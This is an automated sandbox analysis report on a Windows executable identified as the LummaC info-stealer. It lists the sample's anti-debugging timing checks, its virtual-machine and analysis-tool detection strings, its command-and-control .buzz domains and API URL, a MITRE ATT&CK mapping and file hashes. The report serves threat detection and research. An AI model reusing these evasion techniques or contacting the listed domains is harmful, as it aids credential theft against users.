      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79D7 second address: 3B79DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBB7F second address: 3CBB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBFh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBB92 second address: 3CBB9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBB9C second address: 3CBBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBCFF second address: 3CBD1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBE6D second address: 3CBE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBE71 second address: 3CBE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBE77 second address: 3CBE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CBE7D second address: 3CBE9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CACC719E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8CACC719F3h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CC159 second address: 3CC178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBCh 0x00000007 jmp 00007F8CACB12CBFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CC494 second address: 3CC4D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EFh 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F8CACC719F5h 0x00000019 popad 0x0000001a jnl 00007F8CACC719EEh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CC906 second address: 3CC90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CC90A second address: 3CC91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F8CACC719E6h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CC91A second address: 3CC920 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CCA8D second address: 3CCAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8CACC719EBh 0x0000000b jmp 00007F8CACC719EEh 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CCAB6 second address: 3CCAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CCAC1 second address: 3CCAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CF9B2 second address: 3CF9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CF9B7 second address: 3CFA46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F8CACC719E8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D2921h] 0x0000002a stc 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F8CACC719E8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 movzx edx, ax 0x0000004a call 00007F8CACC719E9h 0x0000004f push eax 0x00000050 push edx 0x00000051 jns 00007F8CACC719F6h 0x00000057 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFA46 second address: 3CFA6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F8CACB12CBAh 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8CACB12CBCh 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFA6B second address: 3CFAA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719F4h 0x00000008 jmp 00007F8CACC719F2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8CACC719EAh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFAA5 second address: 3CFABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACB12CC5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFABF second address: 3CFAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e js 00007F8CACC719E6h 0x00000014 jmp 00007F8CACC719F5h 0x00000019 popad 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFAE9 second address: 3CFAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3CFD10 second address: 3CFDB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cmc 0x0000000b push dword ptr [ebp+122D1DFBh] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F8CACC719E8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b pushad 0x0000002c sub dword ptr [ebp+1245323Bh], esi 0x00000032 sub dword ptr [ebp+122D2B7Dh], edi 0x00000038 popad 0x00000039 and dx, A005h 0x0000003e call 00007F8CACC719E9h 0x00000043 push ecx 0x00000044 jp 00007F8CACC719ECh 0x0000004a ja 00007F8CACC719E6h 0x00000050 pop ecx 0x00000051 push eax 0x00000052 jnp 00007F8CACC719FBh 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c jl 00007F8CACC719ECh 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 mov eax, dword ptr [eax] 0x0000006a pushad 0x0000006b jng 00007F8CACC719ECh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3D1023 second address: 3D1033 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8CACB12CB6h 0x00000008 jnc 00007F8CACB12CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3D1033 second address: 3D1046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8CACC719EDh 0x0000000b rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSpecial instruction interceptor: First address: 13876F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSpecial instruction interceptor: First address: 13880F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSpecial instruction interceptor: First address: 2D8F01 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSpecial instruction interceptor: First address: 2E3928 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013803F rdtsc 0_2_0013803F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe TID: 1216Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe TID: 2484Thread sleep time: -30000s >= -30000sJump to behavior
      Source: PH1D3KHmOD.exe, PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735501001.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile opened: SICE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013803F rdtsc 0_2_0013803F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011E110 LdrInitializeThunk,0_2_0011E110

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: PH1D3KHmOD.exeString found in binary or memory: hummskitnj.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: cashfuzysao.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: appliacnesot.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: screwamusresz.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: inherineau.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: scentniej.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: rebuildeso.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: prisonyfork.buzz
      Source: PH1D3KHmOD.exeString found in binary or memory: mindhandru.buzz
      Source: PH1D3KHmOD.exe, PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rProgram Manager
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      Process Injection      		24
      Virtualization/Sandbox Evasion      		OS Credential Dumping641
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory24
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PH1D3KHmOD.exe57%VirustotalBrowse
      PH1D3KHmOD.exe61%ReversingLabsWin32.Trojan.Generic
      PH1D3KHmOD.exe100%AviraTR/Crypt.XPACK.Gen
      PH1D3KHmOD.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://mindhandru.buzz/api07100%Avira URL Cloudmalware
      https://mindhandru.buzz/apiY100%Avira URL Cloudmalware
      https://mindhandru.buzz/api##3YX100%Avira URL Cloudmalware
      https://mindhandru.buzz/e100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      mindhandru.buzz
      		172.67.165.185
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        scentniej.buzzfalse
          		high
          prisonyfork.buzzfalse
            		high
            rebuildeso.buzzfalse
              		high
              appliacnesot.buzzfalse
                		high
                hummskitnj.buzzfalse
                  		high
                  screwamusresz.buzzfalse
                    		high
                    mindhandru.buzzfalse
                      		high
                      cashfuzysao.buzzfalse
                        		high
                        inherineau.buzzfalse
                          		high
                          https://mindhandru.buzz/apifalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.micropPH1D3KHmOD.exe, 00000000.00000003.1734604183.00000000015B7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://mindhandru.buzz/api07PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://mindhandru.buzz/apiYPH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://mindhandru.buzz/api##3YXPH1D3KHmOD.exe, 00000000.00000003.1734709037.000000000155B000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735729903.000000000155C000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001559000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://mindhandru.buzz/piPH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://mindhandru.buzz/ePH1D3KHmOD.exe, 00000000.00000002.1735682639.0000000001542000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001542000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                172.67.165.185
                                		mindhandru.buzzUnited States
                                		13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581225
                                Start date and time:2024-12-27 08:48:37 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 51s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:PH1D3KHmOD.exe
                                renamed because original name is a hash value
                                Original Sample Name:f1f1fb7ce16d5883ea795e1ebbafcf7a.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:49:33API Interceptor2x Sleep call for process: PH1D3KHmOD.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                172.67.165.185oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                    U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                      ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                        P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                          r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                            i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                              XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                  dEugughckk.exeGet hashmaliciousLummaCBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    mindhandru.buzzIERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    • 172.67.165.185
                                                    zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    • 172.67.165.185
                                                    P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUS7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    • 172.67.165.185
                                                    zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.11.101
                                                    U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                    • 172.64.41.3
                                                    6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.135.139
                                                    9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.153.243
                                                    uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.71.155

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e17jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    • 172.67.165.185
                                                    zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                    • 172.67.165.185
                                                    6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185
                                                    9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.165.185
                                                    uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.165.185

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.949298049487091
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:PH1D3KHmOD.exe
                                                    File size:1'867'776 bytes
                                                    MD5:f1f1fb7ce16d5883ea795e1ebbafcf7a
                                                    SHA1:76f16e6397a95661beeefa1ad5d033c819bdd884
                                                    SHA256:d01629b4c91f9bdffa26efc4e7666093d830ec350d4e7435ad525813645a6af9
                                                    SHA512:ed9a9225669b1fde54f6f1e234d391105e44e1ea7fdf1b5ea428178d2cc9a6fc17bdeea23b9b81cf74bf177fd302d570e6493f077fe81eb1c923065d183176c7
                                                    SSDEEP:49152:eFBxdOFtXROhwSt5Ecj5GKDyd5NlEmxh:eFvdOFtXROhwStOEm6
                                                    TLSH:FD8533931DA29BBECCDFC9F64577A0D51F78EC4E2210C1106A04F2B9D5CAAC939768C9
